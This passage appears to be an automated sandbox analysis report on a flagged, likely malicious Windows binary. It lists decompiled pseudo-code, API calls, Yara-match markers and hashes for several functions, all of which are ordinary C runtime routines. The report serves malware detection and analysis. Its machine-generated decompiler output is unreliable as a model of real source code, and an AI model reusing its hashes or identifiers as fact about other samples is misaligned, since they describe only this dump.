                                        0x00407a30
                                        0x00407a32
                                        0x00407a34
                                        0x00407a36
                                        0x00407a39
                                        0x00407a3e
                                        0x00407a59
                                        0x00407a5b
                                        0x00407a65
                                        0x00407a67
                                        0x00407a68
                                        0x00407a6a
                                        0x00000000
                                        0x00000000
                                        0x00407a6c
                                        0x00407a72
                                        0x00407a72
                                        0x00000000
                                        0x00407a72
                                        0x00407a40
                                        0x00407a42
                                        0x00407a46
                                        0x00407a4b
                                        0x00407a4d
                                        0x00407a4f
                                        0x00000000
                                        0x00000000
                                        0x00407a51
                                        0x00000000
                                        0x00407a51
                                        0x004079e7
                                        0x004079ec
                                        0x00000000
                                        0x00000000
                                        0x004079f2
                                        0x004079f4
                                        0x00000000
                                        0x00000000
                                        0x00407a10
                                        0x00407a14
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00407a1a
                                        0x0040794d
                                        0x0040794f
                                        0x00407951
                                        0x00407959
                                        0x00407978
                                        0x0040797a
                                        0x00407984
                                        0x00407986
                                        0x00407987
                                        0x00407989
                                        0x00000000
                                        0x00000000
                                        0x0040798f
                                        0x00407995
                                        0x00407995
                                        0x00000000
                                        0x00407995
                                        0x0040795d
                                        0x00407961
                                        0x00407966
                                        0x0040796a
                                        0x00000000
                                        0x00000000
                                        0x00407970
                                        0x00000000
                                        0x00407970

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                        • __alloca_probe_16.LIBCMT ref: 00407961
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                        • __alloca_probe_16.LIBCMT ref: 00407A46
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                        • __freea.LIBCMT ref: 00407AB6
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        • __freea.LIBCMT ref: 00407ABF
                                        • __freea.LIBCMT ref: 00407AE4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                        • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 72%
                                        			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x368bd1fa
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                        0x0040822b
                                        0x00408232
                                        0x00408235
                                        0x0040823d
                                        0x00408241
                                        0x0040824d
                                        0x00408250
                                        0x00408253
                                        0x0040825a
                                        0x00408262
                                        0x00408265
                                        0x0040826b
                                        0x00408271
                                        0x00408276
                                        0x00408278
                                        0x0040827b
                                        0x00408280
                                        0x0040828a
                                        0x00408291
                                        0x00408294
                                        0x0040829b
                                        0x004082a2
                                        0x004082ce
                                        0x004082f4
                                        0x004082f6
                                        0x00000000
                                        0x004082d0
                                        0x004082d3
                                        0x0040839a
                                        0x004083a6
                                        0x004083b1
                                        0x004083b6
                                        0x004082d9
                                        0x004082e0
                                        0x004082e5
                                        0x004082eb
                                        0x004082f1
                                        0x00000000
                                        0x004082f1
                                        0x004082eb
                                        0x004082d3
                                        0x004082a4
                                        0x004082a8
                                        0x004082ab
                                        0x004082b1
                                        0x004082b3
                                        0x004082b6
                                        0x004082ba
                                        0x004082f7
                                        0x004082fa
                                        0x004082fb
                                        0x00408300
                                        0x00408306
                                        0x0040830c
                                        0x0040831b
                                        0x00408321
                                        0x00408327
                                        0x0040832c
                                        0x00408348
                                        0x004083bb
                                        0x004083c1
                                        0x0040834a
                                        0x00408352
                                        0x0040835b
                                        0x00408361
                                        0x00000000
                                        0x00408363
                                        0x00408365
                                        0x00408368
                                        0x00408381
                                        0x00000000
                                        0x00408383
                                        0x00408387
                                        0x00408389
                                        0x0040838c
                                        0x00000000
                                        0x0040838c
                                        0x00408387
                                        0x00408381
                                        0x00408361
                                        0x0040835b
                                        0x00408348
                                        0x0040832c
                                        0x00408306
                                        0x00000000
                                        0x0040838f
                                        0x0040838f
                                        0x004083c3
                                        0x004083cd
                                        0x004083d5

                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                        • __fassign.LIBCMT ref: 004082E0
                                        • __fassign.LIBCMT ref: 004082FB
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                        • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                        • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                        • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 27%
                                        			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x368bd1fa
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                        0x00403639
                                        0x00403640
                                        0x00403643
                                        0x00403647
                                        0x00403652
                                        0x0040365a
                                        0x00403665
                                        0x0040366b
                                        0x0040366f
                                        0x00403676
                                        0x0040367c
                                        0x0040367c
                                        0x0040367e
                                        0x00403683
                                        0x00403688
                                        0x00403688
                                        0x00403693
                                        0x0040369b

                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                        • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x368bd1fa
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                        0x004062c0
                                        0x004062c7
                                        0x004062ca
                                        0x004062d3
                                        0x004062d8
                                        0x004062dd
                                        0x004062e2
                                        0x004062e5
                                        0x004062e7
                                        0x004062e7
                                        0x004062ec
                                        0x00406305
                                        0x0040630b
                                        0x00406310
                                        0x004063af
                                        0x004063b3
                                        0x004063b8
                                        0x004063b8
                                        0x004063cc
                                        0x004063d4
                                        0x004063d4
                                        0x00406316
                                        0x00406319
                                        0x0040631e
                                        0x00406322
                                        0x0040636e
                                        0x00406370
                                        0x00406372
                                        0x00406377
                                        0x0040638e
                                        0x00406396
                                        0x004063a6
                                        0x004063a6
                                        0x00406396
                                        0x004063a8
                                        0x004063a9
                                        0x00000000
                                        0x004063ae
                                        0x00406324
                                        0x00406329
                                        0x0040632b
                                        0x0040632d
                                        0x0040632d
                                        0x00406335
                                        0x00406352
                                        0x0040635c
                                        0x00406361
                                        0x00000000
                                        0x00000000
                                        0x00406363
                                        0x00406369
                                        0x00406369
                                        0x00000000
                                        0x00406369
                                        0x00406339
                                        0x0040633d
                                        0x00406342
                                        0x00406346
                                        0x00000000
                                        0x00000000
                                        0x00406348
                                        0x00000000

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                        • __alloca_probe_16.LIBCMT ref: 0040633D
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                        • __freea.LIBCMT ref: 004063A9
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                        • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x368bd1fb
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                        0x00405756
                                        0x0040575a
                                        0x00405761
                                        0x00405765
                                        0x00405773
                                        0x00405789
                                        0x0040578d
                                        0x004057b6
                                        0x004057b8
                                        0x004057bc
                                        0x004057bf
                                        0x004057bf
                                        0x004057c5
                                        0x004057c7
                                        0x00000000
                                        0x004057c8
                                        0x0040578f
                                        0x00405798
                                        0x004057a7
                                        0x0040579a
                                        0x0040579d
                                        0x004057a3
                                        0x004057a3
                                        0x004057ab
                                        0x00000000
                                        0x004057ad
                                        0x004057b0
                                        0x004057b2
                                        0x00000000
                                        0x004057b2
                                        0x004057ab
                                        0x00405767
                                        0x0040576c
                                        0x00000000

                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                        • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                        • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 71%
                                        			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                        0x00404320
                                        0x00404320
                                        0x00404320
                                        0x0040432a
                                        0x0040432c
                                        0x00404331
                                        0x00404334
                                        0x00404342
                                        0x00404349
                                        0x0040434e
                                        0x00404351
                                        0x00404354
                                        0x00404366
                                        0x0040436b
                                        0x0040436d
                                        0x00404378
                                        0x0040437f
                                        0x00404384
                                        0x00404387
                                        0x00404389
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040436f
                                        0x0040436f
                                        0x00000000
                                        0x0040436f
                                        0x00404356
                                        0x00404356
                                        0x00404357
                                        0x00404357
                                        0x0040435c
                                        0x00404397
                                        0x00404398
                                        0x0040439e
                                        0x004043a3
                                        0x004043a6
                                        0x004043a7
                                        0x004043a8
                                        0x004043af
                                        0x004043b1
                                        0x004043b3
                                        0x004043b8
                                        0x004043bb
                                        0x004043c9
                                        0x004043d5
                                        0x004043d8
                                        0x004043db
                                        0x004043ed
                                        0x004043f2
                                        0x004043f4
                                        0x004043ff
                                        0x00404405
                                        0x0040440d
                                        0x0040440f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004043f6
                                        0x004043f6
                                        0x00000000
                                        0x004043f6
                                        0x004043dd
                                        0x004043dd
                                        0x004043de
                                        0x004043de
                                        0x00404411
                                        0x00404412
                                        0x00404412
                                        0x004043bd
                                        0x004043c3
                                        0x004043c7
                                        0x0040441a
                                        0x0040441b
                                        0x00404421
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004043c7
                                        0x00404428
                                        0x00404428
                                        0x00404336
                                        0x0040433c
                                        0x00404340
                                        0x0040438b
                                        0x0040438c
                                        0x00404396
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404340

                                        APIs
                                        • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                        • _abort.LIBCMT ref: 0040439E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_abort
                                        • String ID:
                                        • API String ID: 88804580-0
                                        • Opcode ID: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
                                        • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                        • Opcode Fuzzy Hash: 748d6134d9c6c0cb73fdca7d7eb4e83c201390a1d6e057c9cacbb9a7c1b02d9b
                                        • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                        0x004025ba
                                        0x004025bf
                                        0x004025cb
                                        0x004025d0
                                        0x004025d5
                                        0x004025d7
                                        0x004025e2
                                        0x004025d9
                                        0x004025d9
                                        0x00000000
                                        0x004025d9
                                        0x004025cd
                                        0x004025cd
                                        0x004025cf
                                        0x004025cf

                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                          • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                        Uniqueness

                                        Uniqueness Score: -1.00%